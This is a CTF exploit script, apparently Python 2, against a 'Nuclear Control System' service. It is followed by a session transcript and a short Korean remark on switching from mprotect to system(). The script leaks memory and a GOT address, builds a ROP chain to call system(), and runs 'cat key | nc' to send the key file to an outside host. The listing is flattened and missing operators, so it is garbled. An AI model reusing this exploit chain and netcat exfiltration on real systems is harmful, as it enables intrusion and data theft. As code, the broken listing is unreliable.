nuclear_d4f699f3dbb8aadf7c224aa57f57eb4c
from socket import *
from struct import *
import time
# NOTE(review): this listing was flattened onto a single line when the page was
# extracted -- line breaks, some operators and the format-string arguments of
# pack()/unpack() are missing -- so it is not runnable as shown. It is kept
# byte-for-byte rather than reconstructed.
# Python 2 syntax throughout (print statements, str payloads).
# `ip` is assigned twice; the first value is dead.
# `mpro_exploit` references `shellcode`, which is never defined in this file,
# and is never called -- only the `sys_exploit` path is exercised below.
# The triple-quoted block at the end is a session transcript, not code.
p = lambda x : pack(" up = lambda x : unpack(" ip = "192.168.0.109" ip = "58.229.183.22" port = 1129 s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) launchcode = "in the end, i was there." # this is passkey send_plt = 0x08048900 recv_plt = 0x080488e0 send_wrap = 0x08048a0d recv_wrap = 0x08048a6f mprotect_got = 0xb75f22b0 freespace = 0x0804b500 ppppr = 0x0804917c pppr = ppppr 1 ppr = pppr 1 pr = ppr 1 r = pr 1 def leak_payload1(): payload = "" payload = "1" * 500 payload = "/" payload = "1" * 1000 return payload def leak_payload2(): payload = "" payload = "1." payload = "1" * 500 payload = "/" payload = "1" * 1000 return payload def leak_setsock_got(): payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(send_wrap) payload = p(ppr) payload = p(4) payload = p(0x0804b00c) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) payload = p(pr) payload = p(4) payload = p(0x08048b5b) return payload def mpro_exploit(mprotect): # mprotect payload payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(mprotect) payload = p(pppr) payload = p(freespace) payload = p(3000) payload = p(7) payload = p(recv_wrap) payload = p(pr) payload = p(4) payload = p(freespace) payload = p(len(shellcode)) return payload def sys_exploit(system): payload ="" payload = "A" * 0x20c payload = "BBBB" payload = p(recv_wrap) payload = p(pppr) payload = p(4) payload = p(freespace) payload = p(len("cat key | nc 220.117.247.200 12071\x00")) payload = p(system) payload = p(pr) payload = p(freespace) payload = p(0x08048b5b) return payload #########################[START EXPLOIT]############################## print s.recv(1024) print s.recv(1024) s.send("target\n") print s.recv(1024) s.send(leak_payload1() "\n") # try to leak ##################[End LEAK FILE NAME - 1]############################ print s.recv(4096) print s.recv(4096) s.send("target\n") print s.recv(4096) s.send(leak_payload2() "\n") # try 
to leak File name ##################[End LEAK FILE NAME - 2]############################ print s.recv(4096) launchcode = s.recv(4096).split('\n')[0] launchcode = launchcode[len(launchcode)-24:] # get launchcode launchcode = "\n" print "LEAKED NUCLEAR LAUNCH CODE IS : " launchcode ##################[End LEAK FILE NAME - 3]############################ s.send("launch") print s.recv(4096) s.send(launchcode) print s.recv(1024) s.send(leak_setsock_got()) print s.recv(1024) time.sleep(1) setsockopt = up(s.recv(1024)[0:4]) print hex(setsockopt) print s.recv(1024) ##################[ End LEAK SETSOCK 'GOT' ]########################## mprotect = setsockopt - 0x6810 system = setsockopt - 0xb2860 print hex(system) #######################[ GOT SYSTEM PTR ]############################# s.send(sys_exploit(system)) time.sleep(0.3) s.send("cat key | nc 220.117.247.200 12071\x00") time.sleep(0.3) ############################[ GET KEY ]############################### s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) s.recv(1024) ##########################[ End Of File ]############################# """ "in the end, i was there." # this is passkey ###################################################################### :: Welcome to the Nuclear Control System :: > [ ] Enter coordinate of target, (Latitude/Longitude) ---> [ ] Target coordinate setting completed. > [!] Unknown command : 11111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111넁%P > [!] 
Unknown command : 11111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 111111111111111111111 > [ ] Enter coordinate of target, (Latitude/Longitude) ---> [ ] Target coordinate setting completed. LEAKED NUCLEAR LAUNCH CODE IS : in the end, i was there. [ ] Enter the passcode to launch the nuclear : [ ] Correct passcode! [2J[0;0H[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE COUNT DOWN : 100 0xb76a8ac0L [5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE COUNT DOWN : 99 0xb75f6260L C:\Users\Administrator> C:\Users\Administrator>nc -lvp 12071 listening on [any] 12071 ... 58.229.183.22: inverse host lookup failed: h_errno 11004: NO_DATA connect to [192.168.0.93] from (UNKNOWN) [58.229.183.22] 45227: NO_DATA BUG_BOUNTIES_b3COM3_GrEAT """ # Key : BUG_BOUNTIES_b3COM3_GrEAT ##############################[ Result ]##############################
Key : BUG_BOUNTIES_b3COM3_GrEAT
처음에 mprotect로 시도했는데 잘 안 돼서 system으로 전환했더니 잘 된다.
이럴 수가! [근데 cd80의 풀이를 보니 mprotect도 잘되는 것 같았다... -_-]